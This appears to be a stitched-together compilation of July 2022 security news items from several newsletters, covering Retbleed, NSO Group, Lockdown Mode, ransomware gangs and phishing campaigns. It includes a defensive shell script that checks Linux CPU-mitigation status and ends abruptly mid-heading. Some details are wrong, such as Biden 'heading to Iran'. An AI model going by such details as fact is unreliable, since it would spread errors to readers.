  • The hard part of improving grid security is changing the culture of the industry in which, the access of operators to those controls that they use to respond in real-time to component failures or imbalances between load and supply, trump cybersecurity and grid resilience.

Read more in

OMB is Developing Real-Time Zero-Trust Scoring

The US Office of Management and Budget (OMB) is developing a way to generate real-time zero-trust scores for network users. The effort is the agency’s response to the May 2021 Cybersecurity Executive Order, which directs federal agencies to adopt zero-trust cybersecurity principles and make necessary adjustments to their network architectures.

Note

  • In order to come close to something like “zero trust” you first need strong authentication in use and IT and security operations meeting basic security hygiene requirements around configuration and vulnerability management, privilege management, etc. So, realistically any scoring system should be showing near zero for several fiscal years, no hurry.
  • This appears to be about trusting users rather than systems and architectures, the hard part to see in real-time.

Read more in

L3Harris Will Not Pursue Purchase of NSO Group

L3Harris, a US defense contractor, has reportedly dropped its efforts to buy NSO Group, which makes Pegasus spyware and hacking tools. L3Harris began negotiations with NSO in June. The US Department of Commerce placed NSO on its entity blacklist in November 2021; the Biden administration recently raised security concerns about the potential purchase, which reportedly prompted L3Harris to call off its negotiations.

Note

  • SANS instructor Heather Mahalik, at the RSA Conference SANS New Threats and Attacks keynote panel, discussed why you need to look at the risks of “stalkerware” with Pegasus as the prime example. There is a need for intelligence community tools to track bad actors, really powerful stalkerware will always be used there and almost as powerful stalkerware will be used commercially, too – but done under the name of “marketing AI.” For really high value users, like CEO, CFO, board, etc. extraordinary protection will be required – see previous NewsBites comments on Apple’s LockDown feature coming for iPhones.
  • Counterintelligence concerns and suggestions should be factored in as risks in your decision-making process. This doesn’t mean you have to accept their recommendation; it means don’t discount it without careful consideration. Additionally, there are financial consequences for disregarding DOC sanctions, such as blacklisting an entity. The point is to make an informed decision rather than being blindsided by unintended consequences.

Read more in

GAO: DoD Needs to Mitigate Risks to Defense Industrial Base

A recent report from the US Government Accountability Office (GAO) recommends that the Department of Defense “develop… a robust strategy and measure… and report… on DOD-wide industrial base risk mitigation efforts.” The risks to Defense Industrial Base companies include weak physical and cybersecurity factors and reliance on foreign suppliers.

Note

  • The DoD has over 200,000 suppliers – a rising tide for security in the Defense Industrial Base will raise the security level of all vendors. Great example was when NIST put out encryption standard FIPS 140-1 in 2001 or so, it enabled browser security and the ability to at least do SSL with meaningful encryption. But progress really started to happen a few years later when OMB or GAO required all browser procurements to only use FIPS compliant products -and private industry benefitted enormously.
  • Supply chain security, to include single points of failure, and domestic vs foreign sources will continue to be on the radar for quite some time. Even if you’re not in the defense space, we’ve all learned about the potential consequences of remote or non-redundant suppliers over the last two years. Identify where you have similar dependencies and make sure that you have a plan B & C.

Read more in

New side-channel attack disclosed in Intel and AMD processors

Academics from ETH Zurich published details on Tuesday on a new side-channel attack that impacts modern CPUs from Intel and AMD. The research, named Retbleed, is the latest in a long line of side-channel attacks impacting speculative execution, a feature of modern CPUs where the processors perform data computations in advance as a way to gain processing speed.

In early 2018, academics from different organizations revealed the first two vulnerabilities that take advantage of speculative execution operations by looking at the data that gets processed or discarded during this process, data that can sometimes contain sensitive secrets.

Other side-channel attacks were subsequently discovered, but those initial vulnerabilities, known as Meltdown and Spectre, changed how all major chipmakers looked at CPU design and data security.

One of the defenses that chipmakers and software vendors came up with at the time was a new technique called Retpoline that effectively tried to replace indirect jump and call instructions in the CPU with return instructions since, at the time, return instructions were considered safe from Meltdown and Spectre-like side-channel attacks.

But in their Retbleed research published this week, the ETH Zurich team says they were able to carry out a side-channel attack against modern CPUs through return instructions for the first time, leaking kernel memory containing password hashes from Linux systems.

The researchers said they tested the Retbleed attack in practice on AMD Zen 1, Zen 1+, Zen 2, and Intel Core generation 6–8, but, in theory, AMD CPU families 0x15–0x17 and Intel Core generation 6–8 are all likely affected. In layman’s terms, this means that Intel CPUs 3 to 6 years old, and AMD processors 1 to 11 years old, are likely to be affected.

The good news is that since the original Meltdown and Spectre disclosures, chipmakers and OS vendors now have protocols established for dealing with bugs like this in a more timely manner. While fixing Meltdown and Spectre took months and several tries, the ETH Zurich team said that patches for Retbleed have already been prepared and went out during the July 2022 Patch Tuesday, via both OS and cloud infrastructure updates from all the major providers. Compared to the uncertainty during the Meltdown and Spectre days, all users have to do these days is update their operating system.

Retbleed patches for AMD processors are tracked as CVE-2022-29900, while the Intel fixes are CVE-2022-29901, with additional mitigation information from Intel being available through their blog as well.

ETH researchers noted that installing these patches will have an impact on the CPU’s performance metrics between 14% and 39%, and another issue they found in AMD processors that they named Phantom JMPs (CVE-2022-23825) might even come with a 209% performance overhead.

Concerns about this performance hit will most likely result in many people not installing the patches to protect themselves against “exotic attacks” that are unlikely to be seen in the wild, at least yet.

In some ways, this side channel research is similar to the first cryptography attacks from the 90s and early 2000s, all of which broke smaller pieces of various cryptographic operations, with each new piece of research building on top of the previous work until, at a certain point, major cryptographic algorithms started falling.

And the true risk here is difficult to assess since detections for side-channel attacks don’t really exist. It’s easy to say something isn’t in the wild when you’re not looking for it.

So, while the side-channel attacks of today may seem “exotic” and “impractical” to some, this type of research tends to be cumulative. Eventually it’ll have enough weight for attackers to bother with it. Meanwhile, we’d do well to pay attention to this sort of work and use it to move the needle on CPU design and security.
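The article says that updating the operating system is all that is needed, but it does not show how to confirm that the mitigation is actually active on a given host. The following is an added example, not code from the article or from the ETH Zurich team: a POSIX shell script that reads the Linux kernel’s per-issue status files under /sys/devices/system/cpu/vulnerabilities/ (the `retbleed` entry was added alongside the July 2022 kernel fixes) and flags anything the kernel still reports as vulnerable. The sample directory it builds is constructed for offline use and its values are modelled on, not copied from, real kernel output.

```shell
#!/bin/sh
# Added example (not from the newsletter): summarise the Linux kernel's own
# view of CPU speculative-execution mitigations, including the Retbleed entry.
# The kernel exposes one file per issue under the directory below; a value
# starting with "Vulnerable" means the mitigation is off or unavailable here.

VULN_DIR="${VULN_DIR:-/sys/devices/system/cpu/vulnerabilities}"

# classify_status STRING -> prints mitigated | vulnerable | not_affected | unknown
classify_status() {
    case "$1" in
        "Not affected"*) echo "not_affected" ;;
        "Mitigation:"*)  echo "mitigated" ;;
        "Vulnerable"*)   echo "vulnerable" ;;
        *)               echo "unknown" ;;   # e.g. "Unknown: Dependent on hypervisor status"
    esac
}

# report_dir DIR -> prints "<issue> <class> <raw status>" per file;
# returns 1 if any issue is still vulnerable, 0 otherwise.
report_dir() {
    dir="$1"
    rc=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        status=$(cat "$f")
        class=$(classify_status "$status")
        printf '%-20s %-13s %s\n' "$name" "$class" "$status"
        [ "$class" = "vulnerable" ] && rc=1
    done
    return $rc
}

# count_vulnerable DIR -> prints how many entries are still reported vulnerable
count_vulnerable() {
    n=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        [ "$(classify_status "$(cat "$f")")" = "vulnerable" ] && n=$((n + 1))
    done
    echo "$n"
}

# make_sample_dir -> builds a constructed sysfs look-alike for offline use.
# The strings are modelled on real kernel output but are constructed here.
make_sample_dir() {
    d=$(mktemp -d)
    echo "Mitigation: untrained return thunk; SMT enabled with STIBP protection" > "$d/retbleed"
    echo "Mitigation: Retpolines, IBPB: conditional, STIBP: always-on, RSB filling" > "$d/spectre_v2"
    echo "Not affected" > "$d/meltdown"
    echo "Vulnerable: No microcode" > "$d/mmio_stale_data"
    echo "$d"
}

# Stand-alone use: report on the live host if sysfs is present, else on the sample.
if [ -d "$VULN_DIR" ]; then
    echo "Live host ($VULN_DIR):"
    report_dir "$VULN_DIR" || echo "WARNING: at least one speculative-execution issue is still unmitigated"
else
    echo "No sysfs vulnerability directory here; showing the constructed sample:"
    report_dir "$(make_sample_dir)" || echo "WARNING: sample contains an unmitigated issue"
fi
```

On a patched host the `retbleed` line should read `Mitigation: ...`; a `Vulnerable` value after the July 2022 updates usually means the kernel or microcode update has not been applied or the mitigation was disabled on the kernel command line.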

Uniswap phishing campaign

Customers of the Uniswap crypto-exchange have lost millions of US dollars worth of cryptocurrency following a phishing campaign that took place over the past few days. According to early estimates from blockchain security firm SlowMist, the losses are currently estimated to be around 7,500 ETH, worth more than $8 million, The Record and Check Point reported.

ECB incident

The European Central Bank said on Tuesday that its president, Christine Lagarde, was targeted in an attempted cyberattack. The ECB said it quickly identified and stopped the attack and that no information was compromised as a result. According to a report, Mrs. Lagarde was allegedly contacted by the attacker via an SMS message that appeared to come from former German Chancellor Angela Merkel, asking her to initiate a conversation via WhatsApp. Mrs. Lagarde discovered the ruse after calling the real Mrs. Merkel to confirm.

Microsoft clarifies VBA macro block rollback

After getting blasted by literally everyone in the cybersecurity industry last week, Microsoft said that its decision to roll back a security-related change (the blocking of VBA macros in Office apps) is only a temporary solution and that the company intends to eventually re-enforce the VBA macro block—although the company did not say when. [Additional coverage in The Record]

Windows Autopatch

Microsoft has formally launched its Windows Autopatch service, a feature for its enterprise customers that could be used to automate the installation of Windows updates on large fleets of PCs. Windows Autopatch is now available for Microsoft customers with E3 and E5 licenses.

IBM knee-caps Rumble & RT

US tech giant IBM has pulled its services for US right-wing video portal Rumble. The company moved to deplatform Rumble after an inquiry from Cyberscoop’s AJ Vicens, who asked why IBM was helping RT air its propaganda through its Rumble accounts.

IPv4 address price doubles in a year

The price of an IPv4 address has almost doubled over the past year, according to SIDN, the Netherlands’ official domain registrar. Prices have gone up from only $5/IP in 2015 to $25-$30 last year and $50-$60 today, showing the growing scarcity in the IPv4 market.

Germany rethinks its approach to cybersecurity

The German Federal Ministry of the Interior has published its plan to revamp the country’s approach to cybersecurity. Among the proposed changes are initiatives to move the responsibility for the country’s cyber-security defense from local state governments to the federal government’s BKI agency, as well as giving German agencies the power to respond to cyberattacks. The new plan will go under public debate and needs to pass through the German Parliament.

US has an outdated view of the internet

A report published by the Council on Foreign Relations this week urges the US government to confront and rethink its current view of the global internet as a fragmented network controlled by multiple aggressive states and not the global utopian collaboration network the US government first envisioned 40 years ago. The CFR argues that the internet has become a haven for corporate and government espionage, political manipulation through disinformation and misinformation campaigns, and various criminal activities. CFR officials urge Washington to work with allies to protect as much as possible the openness of the current internet while also cracking down on its negative parts, with some proposals like:

  • Adopt a shared policy on digital privacy, interoperable with the EU’s GDPR.
  • Resolve outstanding issues on US-European Union (EU) data transfers.
  • Create an international cybercrime center.
  • Declare norms against destructive attacks on election and financial systems.
  • Negotiate with adversaries to establish limits on cyber operations directed at nuclear command, control, and communications (NC3) systems.
  • Develop coalition-wide practices for the Vulnerabilities Equities Process (VEP).
  • Adopt greater transparency about defend-forward actions.
  • Hold states accountable for malicious activity emanating from their territories.
  • Clean up US cyberspace by offering incentives for internet service providers (ISPs) and cloud providers to reduce malicious activity within their infrastructure.
  • Address the domestic intelligence gap, and more.

China to enforce new data export rules

The Chinese government passed new legislation last week that introduces new rules for companies that send the data of Chinese citizens to servers abroad. Any Chinese tech company that has sent the data of more than 100,000 Chinese citizens abroad will be subject to security audits by the Chinese Cybersecurity Authority (CAC). The CAC will primarily check whether companies took steps to protect the exported data against hacks, interception, or tampering. The new law enters into effect on September 1, 2022, but applies retroactively to all companies that have exported user data abroad after January 1, 2021.

BianLian ransomware group

Threat intelligence company BetterCyber has discovered a new ransomware group named BianLian, which also operates a leak site on the dark web, where it publishes data from victims who refuse to pay.

Lilith

Another new ransomware gang that made its presence felt this month is a group called Lilith. This is now the sixth new major ransomware gang that has popped up on the scene in the past month after Cheers, Yanluowang, 0mega, RedAlert, and BianLian.

NWGEN

A new threat actor calling itself NWGEN appears to have split from the LAPSUS$ gang and is carrying out new attacks. According to Microsoft’s Christopher Glyer, the group uses the same tradecraft used by the original LAPSUS$ gang, which should make it easier to detect and mitigate possible attacks on targeted organizations. Per Kevin Beaumont, NWGEN appears to be dabbling in ransomware too, which is super bad news for some orgs.

Reverse proxy phishing

Microsoft has published a report on a large-scale phishing campaign that used reverse proxy servers for its phishing sites. This technique, also known as adversary-in-the-middle (AiTM) phishing, allowed the threat actors to obtain not only credentials from victims but also the authentication cookies that are generated after victims go through a legitimate 2FA challenge. Microsoft said this campaign has been running since September 2021, has hit more than 10,000 organizations, and has been linked to several BEC attacks.

[Figures from the Microsoft report: overview of the AiTM phishing campaign and follow-on BEC; the AiTM phishing website intercepting the authentication process; the AiTM phishing campaign and follow-on BEC in the context of Microsoft 365 Defender threat data.]

Nigerian threat actor

The team at DomainTools published a report this week on the activities of a Nigerian threat actor, which they linked to an extensive campaign to impersonate medical institutions in the US with the aim of fraudulently procuring medical equipment from the manufacturers in the name of hospital systems.

AlphV evolves

The operators of the AlphV (BlackCat) ransomware have launched a dedicated section on their leak site that allows anyone to search through all the data they stole and leaked from past victims. More in this Resecurity report.

Threat actor impersonates cybersecurity firms

Crowdstrike said it identified a threat actor carrying out a phishing campaign that impersonated various prominent cybersecurity companies. Crowdstrike wasn’t able to specifically identify the threat actor behind this operation but says various operational details suggest this threat actor uses tactics similar to those of the Wizard Spider (Conti) group.

Hagga group

Team Cymru published a report on the backend infrastructure of Hagga, a threat actor that has been known to distribute infostealers since the start of 2020. The group is also known as Aggah in some reports.

Read more

Coinminers targeting MSSQL servers

The DFIR Report team published a technical analysis on Monday on a brute-force campaign targeting the admin accounts of MSSQL database servers. The researchers said the goal of this campaign is to compromise databases and then deploy a cryptocurrency-mining app to generate profits for the attackers.

Coinminers abuse GitHub Actions and Azure VMs

A report we missed from last week is one from Trend Micro, which uncovered a coinminer gang abusing GitHub Actions to mine cryptocurrency using Azure VMs on compromised cloud infrastructure.

Hive v5 decrypter

A security researcher named reecDeep has released a free tool that can help victims that had their files locked by version 5 of the Hive ransomware recover their files. Previously, South Korea’s cyber-security agency KISA released decrypters for the first four versions.

ChromeLoader

Palo Alto Networks published a report on Tuesday on ChromeLoader (also known as Choziosi Loader and ChromeBack), a malware strain that appeared in January this year and which works by infecting the settings of Chrome browsers to hijack search queries and redirect users to malicious sites. Another report on this threat is also available from Red Canary.

UAC-0056

In a security alert published on Monday, Ukraine’s CERT team said that it detected a new spear-phishing operation carried out by a Russian threat group known as UAC-0056. This campaign is being carried out from hacked Ukrainian government accounts and aims to infect recipients with Cobalt Strike beacon backdoors.

Disinformation efforts in May

The Google TAG team has published its actions against disinformation efforts that took place on Google services in the month of May 2022. TAG said actions were taken against accounts linked to threat groups operating out of China, Iran, and Russia.

New Intrusion Truth revelations coming

Intrusion Truth, the mysterious group that has doxed the identities and real-life affiliations of at least four Chinese cyber-espionage groups, hinted on Tuesday that they have a new report coming out soon.

New AWS IAM Authenticator vulnerability

Gafnit Amiga, a security researcher with Lightspin, discovered a new authentication bypass in the AWS IAM service, a vulnerability that could be used to access AWS customers’ Kubernetes instances. In a security bulletin on Monday, AWS said it fixed the issue at the end of June when it rolled out fixes for all impacted servers. The vulnerability is currently tracked as CVE-2022-2385.

Microsoft Patch Tuesday

The Microsoft Patch Tuesday security updates for the month of July 2022 are officially out. This month, Microsoft fixed 86 vulnerabilities across several products, including CVE-2022-22047, an elevation of privilege vulnerability that was exploited in the wild before the company’s patches.

Bad Azure vulnerability

Among the fixes included in this month’s Patch Tuesday is also a vulnerability in Azure Site Recovery, a service that provides disaster recovery options for cloud resources. Tenable says that this bug—tracked as CVE-2022-33675—can allow threat actors to gain SYSTEM-level privileges on cloud instances where this service is installed. Microsoft said it released Azure Site Recovery 9.49 to address this and other security issues.

MitM on FreshWorks

Vulnerability researchers from Visma’s Red Team have uncovered a serious zero-interaction vulnerability in the FreshService inventory management software. The vulnerability makes it possible for malicious third parties to perform a man-in-the-middle attack on FreshService inventory management agents and deploy malicious updates that can run with administrative privileges on the affected systems.

Kubernetes NGINX Ingress Controller vulnerabilities

The team at Lightspin has published an overview of four recent vulnerabilities in the Kubernetes NGINX Ingress Controller that have been disclosed since October last year. One of the vulnerabilities, CVE-2021-25742, also came under active exploitation.

Other security updates

Besides Microsoft, other companies that recently released security updates also include the Android project, Cisco, Intel, Adobe, VMWare, Citrix, and SAP.

Android zero-day

Unfortunately, a vulnerability in the Android kernel used on Google smartphones that was disclosed on Twitter last week did not receive a patch. According to Android Police, Google didn’t patch the issue because they didn’t know about it, as the researcher did not notify the company before their tweet.

A MITRE Advisory Accidentally Included Live Vulnerable Instances

A MITRE advisory came out recently regarding insecure camera admin interfaces, but rather than the references section just including more information about the vulnerability, it also included a list of vulnerable internet-accessible instances. Read more: Security advisory accidentally exposes vulnerable systems

Apple Introduces “Lockdown Mode” for Likely Spyware Targets

In iOS 16, Apple is introducing a new feature that locks down one’s device against targeted attacks. The primary use cases are people like reporters or high-ranking officials being hit with spyware created by companies like NSO Group. The tool works by disabling functionality within multiple parts of a device, including attachment types in Messages, certain JIT web technologies, incoming communication prompts like FaceTime, wired connections when locked, and the installation of configuration profiles. I say Bravo to Apple on this one, and I can’t wait to see someone take the future steps here of monitoring one’s threat level and adjusting such things dynamically. Read more: Why Lockdown mode from Apple is one of the coolest security ideas ever

FBI and MI5 Say China Steals Constantly and Massively

Speaking at a venue for business leaders, the MI5 and FBI leaders said China is our most serious threat to our intellectual property. “The most game-changing challenge we face comes from the Chinese Communist Party. It’s covertly applying pressure across the globe.” The FBI director went on to say the Chinese hacking program was “lavishly resourced” and “bigger than every other country combined.” Read more: FBI and MI5 bosses: China cheats and steals at massive scale

The Pentagon is Running a Paid Bounty

The Pentagon has been running klout-based bounty programs for a while now, but between July 7th and July 11th they’re paying out up to $110,000 to people who find bugs. They’re paying $500 for highs and $1,000 for criticals. They’ve also said they’ll pay up to $5,000 for really serious issues. Read more: Pentagon: We’ll pay you if you can find a way to hack us

Researchers Have Found a Way to Detect Deepfakes Using Lighting Variations

Researchers at NSA and Cal Berkeley have found a way to detect Deepfakes using lighting variations. They introduce an element on the screen that changes a narrow band of color faster than most Deepfake systems can respond. Read more: Detecting Deepfake Video Calls Through Monitor Illumination

Myanmar’s Authoritarian Government Implements Chinese Surveillance Tech

Myanmar’s Junta government is expanding its installations of Chinese-made surveillance cameras with built-in facial recognition. The plans are being sold as “safe city projects”, as one does. Read more: Exclusive: Myanmar’s junta rolls out Chinese camera surveillance systems in more cities

Iran Announces 20% Enrichment of Uranium

US President Biden is heading to Iran this week and Iran has just released a report saying they’re consistently producing Uranium at 20% enrichment levels at its underground Fordo facility. 20% is a big step towards the 90% needed for weapons-grade uses, but they evidently already have enough 60%-enriched matter for a single bomb if they choose to make one. Read more: Iran enriches to 20% with new centrifuges at fortified site

Arizona Makes It Illegal to Film Within 8 Feet of Police

Arizona has passed a law making it illegal to film police within 8 feet. Lots of freedom-advocacy groups are upset with this law, but I’m happy that it seems to imply it’s ok to do so from 9+ feet away. I mean, 8 feet is pretty damn close to be to anyone you’re not hanging out with, in most situations. I do worry about it being the cop’s word vs. the filmer when it comes to distance, though.

Thousands of Yubikeys have been deployed in Ukraine, more to come

More than 16,000 Yubikeys have been deployed to Ukrainian government executives, workers, and employees of private companies in Ukraine’s critical sectors in the aftermath of Russia’s invasion.

The initiative is spearheaded by Hideez, a Ukrainian security firm specializing in identity services and FIDO consultancy. Earlier this spring, the company secured a donation of 30,000 Yubikey security keys from hardware authentication device maker Yubico.

Since then, Hideez’s staff has been working with Ukrainian government agencies like the Ministry of Digital Transformation, the National Security and Defense Council, and the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) to ensure the devices can be imported into the country, that government infrastructure is prepared for the keys’ rollout, and that recipients receive the necessary training.

The idea is that once government and critical sector workers have a security key as an extra layer of protection, their accounts would be safe from the onslaught of spear-phishing attacks constantly hitting their inboxes every day.

“We got Yubikey certified, so they are allowed to be deployed into Ukraine instances,” Yuriy Ackermann, VP of War Efforts at Hideez, told Risky Business News in a call last week.

“We have quite a few ministries that have moved a lot of their stuff to G Suite and Azure—with them is quite easy; we just give them a key. We made instructions in Ukrainian, video instructions, and so on. […] So, it’s really fast.

“We had a department that pretty much moved to using FIDO, like 500 people, in less than a week because they just needed to understand their policies, read our documentation, and that’s it, they just give the keys and roll them, and voila,” Ackermann said.

But efforts are also underway to roll out the keys to individuals in other departments, including those without the proper server-side infrastructure. In these cases, Ackermann says Hideez has been providing the government with the company’s solution at minimal costs.

Right now, security keys have been deployed to several government departments and companies in the logistics, energy, and telecommunications sectors. But plans go much further.

“Anything without what the country would fall apart is pretty much on top of our bucket list to work with,” Ackermann said.

Ackermann said Hideez’s goal is to deploy 100,000 security keys and maybe, in the distant future, reach a milestone of 1 million security keys deployed to government and critical infrastructure sector—making Ukraine the most cyber-secure country in the world.

“My point is that Ukraine should become an example for other countries who cannot afford […] AI behavioral biometrics anti-phishing system crap, and stuff like this. We cannot afford these things in Ukraine. […] This should become an example on how to actually and effectively defend yourself because we’re dealing with the first cyber war in human history,” Ackermann said.

Australian prison suspends visits

The Port Phillip Prison in Melbourne, Australia, has been forced to suspend prisoner visits after its computer systems fell victim to “a sophisticated cyber ransom attack,” whatever that means.

La Poste Mobile ransomware attack

French mobile phone network La Poste Mobile is still struggling to recover from a ransomware attack that took place more than a week ago and has crippled its administrative and management services. While service has not been affected, the company noted that customer data might have been accessed, The Record reported.

US Congress DDOS

Russian hacktivist DDoS group Killnet claimed responsibility for an attack on the website of the US Congress, according to Cyberscoop.

Stolen crypto

According to blockchain security and auditing company CertiK, cryptocurrency platforms lost more than $2 billion to hacks in the first half of 2022, a figure that’s more than the entire last year combined. The vast majority of breaches have been linked to “flash loan attacks,” the company said.

PyPI enforces 2FA for top projects

The administrators of the Python Package Index (PyPI) are enrolling the top 1% of most popular Python packages (~3,500) into mandatory two-factor authentication (2FA).

The PyPI team said it would be working with the Google Open Source Security Team to distribute Google Titan security keys to all project maintainers in order to ensure their accounts can’t be hijacked for supply chain attacks that could have massive consequences. PyPI’s move comes after GitHub moved to do the same with the top npm packages last year. Unfortunately, the rollout didn’t go as planned and came with some drama: the owner of one Python library decided they didn’t want to maintain a “critical” project and deleted and re-uploaded their package in order to reset the download counter.

Russia to create its own mobile app store

The Russian government approved on Friday the creation of a national mobile app store. The store’s app will be mandatory and will have to be pre-installed on all devices sold in the country. The store will operate based on rules “approved by the Ministry of Digital Development,” which will also curate its app inventory.

L3Harris said they had approval for NSO deal

Last month, US media reported that US defense contractor L3Harris was in advanced talks to acquire Israeli spyware vendor NSO Group, in a deal that fell through after the White House showed its disapproval at a DOD contractor seeking to buy a sanctioned entity. However, in a report on Sunday, the New York Times said that several American intelligence officials were in the know and approved of L3Harris’ plan, believing NSO’s technology could benefit US agencies like the FBI and CIA, but that none of these officials anticipated the Biden administration’s stern response to news of the upcoming acquisition.

UK asks law firms not to recommend paying ransomware gangs

In a joint letter signed by the UK ICO and NCSC, the two agencies have asked British law firms to stop advising their clients to pay ransom demands in ransomware attacks.

Paying ransoms to release locked data does not reduce the risk to individuals, is not an obligation under data protection law, and is not considered as a reasonable step to safeguard data.

The ICO has clarified that it will not take this into account as a mitigating factor when considering the type or scale of enforcement action. It will however consider early engagement and co-operation with the NCSC positively when setting its response.

Dutch secret services told to delete citizen database

The MIVD and the AIVD, the Netherlands’ secret service agencies, have been told to destroy a database they created to store the personal details of millions of Dutch citizens. The country’s data protection supervisor found that the database had been created through an unlawful process and ordered the Dutch Ministries of Defense and the Interior to delete it following a complaint filed by the European Digital Rights (EDRi), a pan-European association of civil and human rights organizations.

Dutch government increases prison sentences for cyber espionage

The Dutch government passed a bill last week that increased the prison sentences for espionage activities. A clause in the document increases the prison sentences by a third for computer offenses if carried out at the behest of a foreign power. [Coverage in RTL Nieuws]

Mauritius Telecom espionage scandal

Sherry Singh resigned at the end of June from the post of CEO of Mauritius Telecom, claiming in a radio interview that the country’s Prime Minister, Pravind Jugnauth, ordered him to install traffic-sniffing equipment on the telecom’s network. Singh said the equipment was meant to monitor and decrypt internet traffic for the benefit of a foreign state, RFI reported.

Immigration services for sale

A threat actor going by the name of Royal Bank is advertising immigration services for countries like the US and Canada on the Russian-language forum XSS. Flashpoint says the threat actor is selling the service to Russian citizens looking to leave the country, and the service costs $5,000.

Gaming accounts on the dark web

Threat intel firm DarkOwl has an overview of gaming and streaming accounts for sale on the dark web.

AstraLocker and Yashma decrypters

Antivirus maker Emsisoft has released on Friday free decrypters for the AstraLocker and Yashma ransomware strains.

Raspberry Robin

Cybereason researchers have published a technical report on the Raspberry Robin malware, which uses LNK files to infect its victims and is usually delivered through file archives, removable devices (USB), or ISO files. According to Cybereason, the majority of victims are located in Europe. A report on the same malware is also available from Red Canary.

Rolling PWN Attack

A security researcher published details last week on a vulnerability in the key fob technology used by Honda cars. The attack, nicknamed Rolling PWN, can allow threat actors to unlock doors and start engines on all Honda cars sold between 2012 and 2022. The vulnerability is currently tracked as CVE-2021-46145. [Coverage in Motherboard]

Attacks on AI systems

In a whitepaper published last week, NCC Group chief scientist Chris Anley explores the common security problems and real-world practical attacks on AI systems.

Recorded Future acquires Hatching

Threat intelligence giant Recorded Future announced on Friday the acquisition of Hatching, a platform specialized in automated sandbox malware analysis.

Apple debuts Lockdown Mode to protect users against high-end spyware

In an unexpected but very welcome move, Apple announced this week plans to add a new security feature to its iOS and macOS operating systems later this fall. Named Lockdown Mode, this new feature will be available as a new “mode” in a device’s settings section.

Apple says that once users enable Lockdown Mode, iOS and macOS will be put into what the company describes as an extreme and super-secure protection mode.

What happens under the hood is that iOS and macOS will turn off some of their internal services and features that are commonly abused by threat actors to attack and compromise devices. Apple said that Lockdown Mode would focus on five major areas of concern for the company. This includes:

  • Messages: Commonly used for the delivery of zero- or one-click exploits, but once Lockdown Mode is enabled, the Messages app will be put into a state where it would only support text and image-based communications, with no support for URL previews or complex audio and video formats.
  • Web browsing: Since many recent actively exploited zero-days against Apple devices are in Safari components, once Lockdown Mode is enabled, Apple said it would disable many of the new and complex web API technologies that have been added in Safari in recent years, but which are not essential to browsing websites. This includes stuff like WebGL, WebAudio, WebRTC, MathML, Picture-in-Picture, and web fonts, among many others.
  • Wired connections: But remote attacks aren’t the only way to compromise iOS and macOS devices. Apple says that once Lockdown Mode is enabled, all wired connection ports will be disabled and blocked once a device is locked.
  • Configuration profiles: A recent technique that has become popular with threat actors has been to trick users into installing malicious OS configuration profiles to secretly add a victim’s device to an attacker’s network. The idea is that once a device is joined to an attacker’s mobile device management (MDM) server, the threat actor can exfiltrate data or install malicious apps on the device. But Apple says that when Lockdown Mode is enabled, a device’s MDM service will be disabled, effectively countering and preventing any such attack from working.
  • Apple services: Besides remote and physical access attacks, Apple users may also be at risk from social engineering attacks. For this, Apple says that Lockdown Mode comes with a feature that will block unknown individuals from starting calls or conversations via Apple services if the owner has not contacted that person before.

Lockdown Mode is not meant for everyday users

With so many features turned off, Apple devices will effectively be thrown back a decade into the past. It is no exaggeration to state that Lockdown Mode will greatly degrade the user experience on an iPhone, iPad, or macOS device.

However, Apple’s security team said they didn’t design this feature to be user-friendly. It is effectively a last-resort option for some of its users that are active civil society members, dissidents, politicians, or intelligence and law enforcement employees. These users are the ones who are typically targeted by advanced threat actors, sometimes state-sponsored entities, which have access to high-grade and expensive exploits designed for stealthy attacks.

Apple hopes that Lockdown Mode will be able to protect these users by disabling all the common avenues of attacks that past high-end exploits and spyware developers have used against its devices.

If you’re a regular Joe Blow, Lockdown Mode will look cool and interesting for a hot minute, after which it will just get in the way of how you connect with friends and use your device. Turning it on will be overkill, and you’ll most likely turn it back off within a few days. However, for people fighting the good fight, Lockdown Mode might end up saving their lives, and we’re not exaggerating when we’re stating this.

Ukrainian intelligence officers leak

A group of Russian hackers calling themselves RaHDit have published a trove of documents with the alleged identities of thousands of Ukrainian intelligence officers. The leak is currently still unverified, Risky Biz News understands, but the RaHDit crew was also previously linked to Project Nemesis, a project among Russian “hacktivists” that doxxed members of the Russian military.

PFC releases list of affected healthcare orgs

Professional Finance Company (PFC), a US company that provides various financial and payment services to the healthcare sector, has disclosed a security incident that took place in February this year and involved a ransomware attack. The company said the hackers stole data from its systems that belonged to more than 600 of its customers, most of which are US healthcare organizations, such as hospitals and clinics, and the stolen data also included patient details. [Coverage in Becker’s Hospital Review]

Hacker steals from Portuguese hotel guests

A hacker has stolen more than half a million euros from the guests of the Marino Boutique Hotel in Lisbon. The hacker broke into the hotel’s online booking platform, locked out the hotel’s personnel, changed room prices to a derisory €40, and emailed the hotel’s former customers this “special offer.” During four days between June 12 and June 16, the hotel said the hacker collected payments for thousands of room bookings, which the hotel said would have normally cost around half a million euros. It took the hotel staff four days to regain access to their booking platform, which they initially thought was having a technical issue. The hotel, which is one of the most expensive in Lisbon, said it is considering suing the booking platform for not detecting the hacker’s intrusion. CNN Portugal said they found the hacker on one of its Telegram channels, where they bragged about having pulled the same attack against other hotels in many other countries. The hacker identified as Russian and claimed to have made over €20 million from his cybercrime activities. [via @chum1ng0]

How the Ronin hack took place

A reporter from cryptocurrency news site The Block has uncovered the root cause of the Ronin Network hack, which lost $540 million worth of cryptocurrency earlier this year, in March, to North Korean state-sponsored hackers. The Block says the company had its IT network compromised after one of its employees was lured into opening a malicious PDF document received from the hackers, touting a fantastic job offer with a generous compensation package, a scheme at which North Korean hackers are known to excel.

Meta sues scraping company

Meta filed a lawsuit this week against a company named Octopus, a US subsidiary of a Chinese tech company. Facebook said Octopus provided website scraping technology to its customers, including the ability to scrape content from Meta properties such as Facebook and Instagram, including private content that’s hidden and requires authentication. In addition, Meta said it also sued a Turkish national named Ekrem Ateş for scraping the data of more than 350,000 Instagram users.

Microsoft rolls back VBA macros ban

After blocking VBA macros in five Office applications earlier this year in February, Microsoft apparently rolled back the change earlier this week, citing “feedback received.” As expected, the rollback of one of the company’s most requested security-related changes launched a whirlwind of complaints and sarcasm directed at Redmond. Even worse, it appears that Microsoft’s change had its desired effect, contributing to a decline in macro-based malware in recent months to the point of extinction. Following Microsoft’s change of heart—cybercrime groups, rejoice, I guess! [Coverage in Bleeping Computer]

Biometrics database speed-run

